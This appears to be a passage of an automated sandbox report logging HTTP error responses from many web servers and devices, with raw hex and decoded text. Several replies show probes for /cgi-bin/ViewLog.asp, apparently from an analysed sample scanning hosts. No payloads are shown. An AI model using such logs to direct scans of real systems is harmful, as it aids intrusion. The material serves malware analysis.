            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 10:57:26 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:57:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20Vary: Accept-EncodingETag: W/"608a73aa-c8c"Content-Encoding: gzipData Raw: 36 36 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ac 56 5d 6f e3 36 16 7d cf af 60 55 4c 61 17 b6 43 4b b2 9d 38 71 80 e9 b4 45 66 9b 99 59 34 c1 76 8b c9 60 41 51 57 36 c7 32 a9 a5 28 67 ec c4 ff 7d 0f 29 3b 49 d1 6e 30 c0 ee 0b 25 92 f7 f3 f0 dc 4b 9e 7f f3 e3 87 37 37 bf ff fd 27 b6 70 ab f2 e2 e8 fc f0 21 91 63 b6 22 27 98 5c 08 5b 93 9b 45 8d 2b fa 27 11 96 6b b7 29 e9 62 20 49 3b b2 f7 85 d1 ae 5f 88 95 2a 37 d3 7f 90 cd 85 16 bd d7 56 89 b2 57 0b 5d f7 6b b2 aa d8 ed 85 a7 a5 d0 f3 ce 76 d1 bf f9 ad fb 82 e2 3b 25 ad a9 4d e1 d8 df 16 a4 e7 97 a4 5e b2 f5 e6 fd d7 d9 fa 5d bc 64 e8 b3 78 d1 0a 29 bb 31 7f 8c 42 59 59 d2 bf 1c 7d 71 6d 2a 77 a4 e6 0b 37 9d 70 be f3 30 de 2f da f9 90 f3 57 bb cc e4 9b fb 95 b0 73 a5 a7 9c 89 c6 99 b3 95 d2 fd bd c8 98 f3 ea 4b 58 b8 53 b9 5b 4c 4f c2 fc b9 fe c0 99 ea 99 41 48 ef 77 a5 28 65 27 e5 af 58 9f 0d 53 58 e9 ee 06 99 71 ce ac 1e a5 47 de f6 73 e9 71 90 8e 87 ad f4 fe 14 f7 02 49 90 f6 39 f5 45 a9 e6 7a da 6e 9f ad c9 3a 05 5f fb d5 95 ca f3 92 70 aa 01 83 43 62 21 ad 36 83 78 fc cc 6b 3b c9 8c cd c9 f6 ad c8 55 53 4f 47 fc d5 59 26 e4 72 6e 4d a3 f3 e9 b7 92 cb b1 94 07 8b 2d aa a5 d2 74 80 a8 b5 11 b8 56 ab 2d 4d 81 2a d2 92 a6 34 76 fa 6d 51 80 61 e1 20 9e ab 78 38 ce 9e 34 e2 f1 93 42 3a 4c b3 d1 68 77 74 7e dc 72 19 3f 8b 96 f2 fe a0 40 f1 5c ad 99 2c 45 5d cf 22 20 1f 5d 9c 1f 63 e5 8f eb 2d 32 be 1e 9e 09 b7 80 fc e5 62 c8 29 ba 48 79 7a 30 f6 64 13 46 aa 47 7f 00 3f 62 2a 9f 45 c2 fb ad b0 b7 17 ac a5 55 95 bb 38 3a fe 9e bd 31 d5 c6 7a ba b1 8e ec b2 98 c7 43 76 bd d1 40 63 be 61 6f b5 1c b0 d7 65 c9 82 40 cd 2c a1 06 d7 94 0f d8 f7 c7 47 47 9d a2 d1 d2 29 a3 3b dd fb b5 b0 4c cc 34 dd b1 7f be bb ba 74 ae fa 95 fe dd 50 ed 3a dd 33 31 30 15 e9 4e 34 27 17 f5 a2 e3 95 aa 6b a5 e7 51 cf d9 86 fc 6e 4d 3a 6f c5 b4 05 72 9b da 09 47 68 15 7a 4e b3 67 1e 54 d1 11 83 20 70 ed 05 66 b3 f4 bb ef b0 e2 a5 9b 7a 36 8b 39 7f 78 78 9a 26 3c ed b6 51 c9 d9 b5 b3 70 18 b4 eb ca e8 9a 6e 80 4b f7 cc 87 4c b3 dc c8 66 85 f6 b3 0f d2 1f fd b1 af 39 84 6a a9 2a 85 a4 a8 7b 46 83 3b ab 1c 01 20 fc ca d2 d4 d4 e9 ee a8 ac 29 e4 9d cf ee 49 4f a3 9b 05 b1 4a cc 89 6d 4c c3 84 25 56 1a b3 84 63 56 18 cb a4 d0 da 38 96 11 66 60 e9 20 ea 6d 17 d3 e8 b6 19 73 71 72 db 9c 9c 9e 0c f1 1f 4f e8 b6 99 8c 4f d2 db e6 f4 64 32 c2 38 19 c7 58 9f c4 e2 b0 3b 8a 13 7e db 24 9c c7 51 4f b9 69 f4 76 55 19 e0 99 a9 92 98 b3 06 39 c1 af f0 71 28 2d 70 6c 92 ac 14 4e c0 5f 84 5e 79 f9 4b f4 e4 74 1c a7 30 35 4e f8 e4 b6 19 65 a7 70 71 70 cd 11 4c eb 3a 25 9e fb dd 11 82 1c 4d 62 8c ad 6b 59 4f a3 cb 92 d0 a1 6f 1b ce 69 c8 6a 67 db 3f bd 14 4c 53 b6 41 10 5a 94 b4 25 ed 9d 13 e4 af 0c c3 51 3b b5 32 75 8f 69 3f 61 a4 65 83 25 2b 42 cc ad 81 10 38 b8 c3 c0 9e bd f1 ac a9 81 5f 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 12:56:40 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 23:57:10 GMTContent-Type: text/htmlContent-Length: 566Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:56:54 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 23 Oct 2022 15:57:11 GMTServer: Apache/2.4.53 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:12 GMTServer: Apache/2.4.6 (CentOS) PHP/7.1.33Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 37 3a 31 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 36 20 28 43 65 6e 74 4f 53 29 20 50 48 50 2f 37 2e 31 2e 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:57:12 GMTServer: Apache/2.4.6 (CentOS) PHP/7.1.33Content-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not foundContent-Type: text/htmlData Raw: 34 30 34 3a 20 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 62 72 3e 55 73 65 20 3c 61 20 68 72 65 66 3d 22 2f 6d 70 66 73 75 70 6c 6f 61 64 22 3e 4d 50 46 53 20 55 70 6c 6f 61 64 3c 2f 61 3e 20 74 6f 20 70 72 6f 67 72 61 6d 20 77 65 62 20 70 61 67 65 73 20 69 6e 74 6f 20 45 45 50 52 4f 4d 0d 0a Data Ascii: 404: File not found<br>Use <a href="/mpfsupload">MPFS Upload</a> to program web pages into EEPROM
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: RomPager/4.07 UPnP/1.0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.17.3Date: Sun, 23 Oct 2022 15:57:16 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 37 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.17.3</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:56:14 GMTServer: ApacheContent-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 36 3a 31 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:56:14 GMTServer: ApacheContent-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:18 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:18 GMTServer: ApacheX-Frame-Options: DENYContent-Length: 217Keep-Alive: timeout=60, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 37 3a 31 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:57:18 GMTServer: ApacheX-Frame-Options: DENYContent-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Sun, 23 Oct 2022 15:57:18 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 